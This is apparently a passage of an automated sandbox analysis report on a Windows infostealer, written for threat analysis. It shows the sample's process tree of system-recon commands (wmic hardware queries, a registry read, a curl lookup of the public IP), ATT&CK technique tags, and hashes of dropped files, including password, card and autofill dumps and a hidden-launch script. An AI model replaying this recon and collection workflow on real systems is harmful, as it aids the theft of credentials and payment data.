    wmic bios get smbiosbiosversion
    3⤵
    PID:1348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2288
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1180
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1908
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:844
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:636
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4004
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2772

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4928

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
PID:8
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Modifies data under HKEY_USERS
  PID:1512
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 784
  2⤵
  - Modifies data under HKEY_USERS
  PID:684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Steam\Launcher\EN-SXA~1\debug.log

Filesize
1KB

MD5
c364ae435d37c5c29f3b180eccd6559b

SHA1
7bad9b366ab90045557dfefdebeaa926c61c0d80

SHA256
14aa0b52ed57b7559995d7e7d90853de7495e3b70f886a44743c8f6c88f409a3

SHA512
cb35872f197c28d2917c7fb0ace22b0c4edee5b3739cf294127ee975c5c2928cf50317dca91da6a41a1c0d95b46025abe1eac5fc4675c7ba371871d49901a555

Download Submit
C:\ProgramData\Steam\Launcher\EN-Sxacgpin.zip

Filesize
2KB

MD5
5d8f2816046eba3d193ab91d43a1b91c

SHA1
1702fef8f248f8e9c06634e9cd2d762968505863

SHA256
7360772650f2977d38342cc00c0d0602245b404ea3bd057a26a051344926e442

SHA512
815462e85d3804bc10c053e75c3efed8ce0aecc9e73c2203614ca369841be8e8ba38e5c1c8a0e456b95b9bac080279b1a6c6d2950e66b86aa685c10dd7f4bc38

Download Submit
C:\ProgramData\Steam\Launcher\EN-Sxacgpin\Autofills\Autofills.txt

Filesize
84B

MD5
f86b510ca1c10d34b472a6ac481de489

SHA1
f09b928594cbe87a95fe507751765ecfe9531730

SHA256
62500cf7bc23a927554cb620f041d8e293c01fdff882ecf5278d94f18e722212

SHA512
9c9a3ecb642fccdcc5ef9bf58b4142bc03fe48430824fb67445b17346284978998a61b70b896b2db5b9ed3928aadc105d349dd5651240dbd451fb8bcabd05cbe

Download Submit
C:\ProgramData\Steam\Launcher\EN-Sxacgpin\Cards\Cards.txt

Filesize
60B

MD5
324080a9ec1ac135f76d418d049e1f3b

SHA1
1278fba9ad7321223fad261f4df96bb4c8b57453

SHA256
2b99323aba75af357ad285b504844594511f667aecf18cc0d3fe6f28b15e1786

SHA512
73375eb77f1ba5e44db4cc42ae2b93f9007a2582e7cc742153692cc2dd547400205e0b741efd99a16dc293aa68b8e754a29dcf46be044b286d1f89cd2b5ff1be

Download Submit
C:\ProgramData\Steam\Launcher\EN-Sxacgpin\Discord\discord.txt

Filesize
15B

MD5
675951f6d9d75fd2c9c06b5ff547c6fd

SHA1
9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

SHA256
60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

SHA512
44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Download Submit
C:\ProgramData\Steam\Launcher\EN-Sxacgpin\Passwords\Passwords.txt

Filesize
68B

MD5
9647d72b2e550494c9002b276c8a47ca

SHA1
fd73657ec071b7bf4b13fd459e2dd6126770b3ad

SHA256
c7fd03466cd8b0d132bd19c9de5b164605645cb480b65063dc129278285d5752

SHA512
945eb3002a581c89fd27820f6a28eff4f5ec780507b5008450c52e12bb9b37ea4e3c44ff0b1ed866e539bb8dec96ee07599f991802be302018d2a95495c5de4a

Download Submit
C:\ProgramData\Steam\Launcher\EN-Sxacgpin\Screenshots\Screenshot.png

Filesize
422KB

MD5
bb8368b73f14ff524357c8b5da99f709

SHA1
90bb61f9c00e777e911cafb07f02e6c256b051cb

SHA256
988d79109c2b85c6b44f0f601809fc099fc313258d7ea7568ce07ea4fa420e39

SHA512
9d065497e78393df9b5df1ea6a61729443c1bd90feb95570cc67bdf3edea24b57709e6740b6ca0d248d3870d41a6c26fce63909f208277c873da1847b3baadcd

Download Submit
C:\ProgramData\Steam\Launcher\EN-Sxacgpin\Serial-Check.txt

Filesize
496B

MD5
b1254d97803f4d553792cfe74ec41103

SHA1
220f54587ee8aa0fefd6ac1042547cfb207d8f7b

SHA256
163641eefc14ae1cacd529945e55fc0963183b845169b4ee6aa4924ce615f421

SHA512
1709f3f70bb408d479123440468b9009cf7cec613015fc8360f1510407143eb6d677bcb260b1adfd767dbea0baf14cd49c923cf476aed10124c2e5537ab45ed6

Download Submit
C:\ProgramData\Steam\Launcher\EN-Sxacgpin\debug.log

Filesize
1KB

MD5
d58f22287faeec10f40ef7cc70700b0a

SHA1
33f5203b340fb4a76584896cb9ae70fa15b26750

SHA256
f665f54d1e494266e310621e2e705b362cbf886538d05a4d1984b35dbbbac51a

SHA512
4b8dc758ff3a58e3076b9c317be630882829757b2dea78b0e58aeeaa635df146c2f060501a09cb1b5a1a216d86525092931c25adc738d3513c181e9657d8604a

Download Submit
C:\ProgramData\Steam\Launcher\EN-Sxacgpin\stolen_files.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
d94320ab879b0e871c777afe94ff0a7a

SHA1
2e51d87d0bb529dd17ff57e011e8591e6dc9ed21

SHA256
696992be7553f6af99d550d920bf442f1fcd4bba3c22f3bfacbe83d2bf684e93

SHA512
9a90f7f620cb560750f050c26bd5b7f844d699e1e3285bdbc1ff5d86cea44aaff633c1e921c6c4da7423dbae30a9347d2640927aeb1d37b4b8db36ff46d9027e

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f79387492e5d2264cb94e2f480feaf78

SHA1
13f478f478bf824d8cccb611ac9b2645d5523c93

SHA256
f7d942ea9e79af246b7a4e461133ed9434f980e837a8b96f1e35f856ddead9e7

SHA512
c1a16d6c0edeba6659f08ae115b4ed5c496063d9e4339ff0869a85295798fb66281dba43b6de8118bda69db0d34a65966f84c522b9adcf94581934438c015479

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
179c13282cb3d9ac83350f6c0fc57490

SHA1
101ecef79bb336e54254114a72ce96385f23df11

SHA256
e593c67c579d6913d568e33acdb21db32da1551b3dd6651435e7e83e4f8cda47

SHA512
3a5b998c1aa7fba18549d7d8b7cfb47f0a694c5f8de53410643026527b035f12f388f4d79d8603d4c728e6194b9d25a65ecf1bd674a09de9ec58656c5427a5d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
18cefb8a6607fef1e79c761bac3c11c2

SHA1
60be5d21b5de7ff7b27364cd4684da32cc260592

SHA256
0ca2a346f988298890d30c43028c0d3829832086d546629fc29786c13a1a68e4

SHA512
6c4b27d026d3f0dd41aa13563e455baf660907053d125bd028ce500fc4dd5163e244b9aaad95338346ce31dbaf3e77e609aecf6450b85650826928e9282caaf3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d65ebc84c6b0b52901fb46f5e2b83ab5

SHA1
d036a0c3eb9e1616d0f7f5ca41171060c13a3095

SHA256
d45581b0807a0d04a70ec75e3e4575e73f148e5b4e0d3d325dfbd6400a4bfbd1

SHA512
88ac232e7702ebd53788cf8429d266ae367111bfccf4bc9d40ead25b552347521458ca60d320e2775b5d2edcaf8501251cb2db68b38dc000ac50463fb80865be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c40d1b3059c7efe3bdd1e9904ffc3d9d

SHA1
d06203aa0a3db350b014b60170c7787ebcc43c09

SHA256
4614a2a24de011532603052f5dc10ffa96451fa3cf9c175c242ccd56fe9580bc

SHA512
ac6db9b67372485919778743010c1f040fa29fa223e04b4c5461d1150f18ced1fd90b39013ed3264e7c6f83cbf07d2b07e2b4905d87c7598f11bc40054cb7db1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ca24df1817fa1aa670674846e5d41614

SHA1
dac66ea013bcc46d24f1ece855568187c6080eaf

SHA256
3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db

SHA512
fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
3ca1082427d7b2cd417d7c0b7fd95e4e

SHA1
b0482ff5b58ffff4f5242d77330b064190f269d3

SHA256
31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

SHA512
bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

Filesize
2KB

MD5
263dbab0b1e6fd7ed52f65d65ed7b75c

SHA1
8aeef364b786b360b48d70d7f72ea59566f487f5

SHA256
17f549384ef65a041ea38cf4494f3ce7584235476347b38f4d10df4a195f6789

SHA512
7a8197007e9bb13ed138ff52c56a10ed5b46fcf0a69a16299181c65d77ea5d2954f1ce85a4810d113d3bd8fd1587138f6a85142bb439d80b18924efaf7b94e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9347.tmp

Filesize
1KB

MD5
a5bdf774415e60031db70e1cd82a7e12

SHA1
cdab55d88541bc247d4a22206eecf1afce25aef7

SHA256
06ea2715df7837b8253962f482ec1049d81c2863265489c00a1d349a7380c92f

SHA512
5ea2e8a52c48276a3a8fd16002bc9c04a70898a58416c564001aced9befd5b0681621b9e20dcad999414a09c4f55471f3f22cf204fbdc78f1248d884672989e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES99A0.tmp

Filesize
1KB

MD5
48b050853d31182af4c002c35c511227

SHA1
9684cb98908b2bf1a550bb64fd2494c22f40d845

SHA256
9aa6bba1241b90ae604d33bb001d2e0d6334620fe864756452c87a3e2c318aa2

SHA512
d04ac1f1a07a50a655173e7f1d16d649248a2f3abd189195dd3e5c3cc6868450b5653657a73f1929311b700d3f0ebed1c7c635fb2694ce876e54246edc2c4ab7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_adrrwagy.1cz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fztpdle2\fztpdle2.dll

Filesize
3KB

MD5
593fce7f4b379c68276fc70efabe0d48

SHA1
9d2de20088539b04b8e968b53a44cf835d2c2a9a

SHA256
679ff21504442c59cccb3c9cc5ae83860e9ba38f53a9ff3a808cd6bdcd649452

SHA512
855aaf882026a8c986a4e58fd91cdbbc45e4880f0fd07f3482e4a5403400bce48a5d738e3cea657cd4266da36f15d42928dce892e1789e9f3c5e0abe0ea1eb5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\pft4ryoz\pft4ryoz.dll

Filesize
3KB

MD5
2d0a3b082df6ede4c5b88199d1fceba8

SHA1
1d3440eca70896d4f39090144c63ba1c84353ad5

SHA256
3c15f3dc8fb13e8304c088f37344e0628925f405db22b633623e9f93cb28dc35

SHA512
f4f9a1b57906c05c3c922b56a638c1c7fbf5b9e19e007146cc81901e0019539dbaa5269ad47dffafd318cc37769015023f336d99beb54de384777631c46eeb89

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fztpdle2\CSCED27ED56003450AB6A0C9D81CFCD6D3.TMP

Filesize
652B

MD5
36ee57695ffa24ab848ff0c1109d0376

SHA1
6bd0171a3e29362760eb8b4e3891de6926202f6d

SHA256
e43300ed1ed4842df851a06630790bbb388d5015a7975e56c95a0520941a9444

SHA512
127acd6112e88b276c83b632c88978c44b28688e7e1e60dc4fa6470cea74186c457bc4fa65e5e0504b567172a275c9ff429c657f0be5c662f68fc944e6747919

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fztpdle2\fztpdle2.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fztpdle2\fztpdle2.cmdline

Filesize
369B

MD5
4b95f820d1f0443d31926f6811ee0178

SHA1
7411311727cba8fd8e8200aa37d13b43873395af

SHA256
0c62da7119c12d3e2aa9c7821c43b1135a6cec4d9bda48568ca0c33608b8036a

SHA512
9b04b8714e04d3711c76ca252b0e9b4a7a5d89f778f071e0342a45ed38bbaba34490ee40a1c2f16895b256c35411f4e6c457fc84204ad33724f48e4455ace28a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pft4ryoz\CSC99EC05581CD945618B9E5F1369787A6B.TMP

Filesize
652B

MD5
0ec304a440803e51d6749401156fb4a2

SHA1
4429ae313ed98c3b5c7099373f478ae095b38df0

SHA256
82b9bf38c8ff0111e04f28711586b793f4f3e9db87aa7e5028e09886bb542c2f

SHA512
3c85f679d8715b25bd28b51af3c31602d6600f9624bdd1b580badcdcbfb61dc9dbde4b7b637effa73ce100a0bd2c320ba92c10a75f8a82b61e82b113e227c173

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pft4ryoz\pft4ryoz.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pft4ryoz\pft4ryoz.cmdline

Filesize
369B

MD5
7b8ac993885a1479621e15818e1195a4

SHA1
05dc77a6db648f62f2fb1424f10f22548de0de49

SHA256
c01a6d93e100bde9bf4e13ee7011c79ba7074b3d902ff09d20c81b6a0a67825e

SHA512
b0291dc24aae24d8c47533e9763dc2aef84a0ea8716207af1784cdfb75fbf9c6e4fb6542c86595095c9d7c08b753081b48c82a1b713d2c8f956d7af600ee4d48

Download Submit
memory/8-542-0x000001BE3AF80000-0x000001BE3AF90000-memory.dmp

Filesize
64KB

Download
memory/8-525-0x000001BE3AE70000-0x000001BE3AE80000-memory.dmp

Filesize
64KB

Download
memory/8-557-0x000001BE3F460000-0x000001BE3F468000-memory.dmp

Filesize
32KB

Download
memory/8-560-0x000001BE3FCD0000-0x000001BE3FCD8000-memory.dmp

Filesize
32KB

Download
memory/684-572-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-576-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-585-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-586-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-587-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-588-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-589-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-590-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-591-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-592-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-563-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-564-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-565-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-568-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-567-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-566-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-569-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-578-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-577-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-584-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-575-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-574-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-573-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-583-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-571-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-570-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-579-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-580-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-581-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/684-582-0x0000021D5FA20000-0x0000021D5FA30000-memory.dmp

Filesize
64KB

Download
memory/1620-188-0x0000022775A90000-0x0000022775A98000-memory.dmp

Filesize
32KB

Download
memory/2520-83-0x00007FFDF2640000-0x00007FFDF3101000-memory.dmp

Filesize
10.8MB

Download
memory/2520-103-0x00007FFDF2640000-0x00007FFDF3101000-memory.dmp

Filesize
10.8MB

Download
memory/2520-99-0x0000020C2BA00000-0x0000020C2BA08000-memory.dmp

Filesize
32KB

Download
memory/2520-86-0x0000020C2BD20000-0x0000020C2BD96000-memory.dmp

Filesize
472KB

Download
memory/2520-85-0x0000020C2BC50000-0x0000020C2BC94000-memory.dmp

Filesize
272KB

Download
memory/2520-72-0x00007FFDF2643000-0x00007FFDF2645000-memory.dmp

Filesize
8KB

Download
memory/2520-84-0x00007FFDF2640000-0x00007FFDF3101000-memory.dmp

Filesize
10.8MB

Download
memory/2520-78-0x0000020C115E0000-0x0000020C11602000-memory.dmp

Filesize
136KB

Download
memory/4312-115-0x0000029762640000-0x0000029762690000-memory.dmp

Filesize
320KB

Download